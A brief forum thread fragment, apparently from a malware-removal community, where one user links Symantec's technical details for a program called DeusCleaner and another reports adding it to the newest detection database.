http://assiste.forum...p=116962#116962

#6
Hardhead

TECHNICAL DETAILS for DeusCleaner

http://www.symantec.com/business/security_...-99&tabid=2



#7
SwampDiner

Added to newest database.




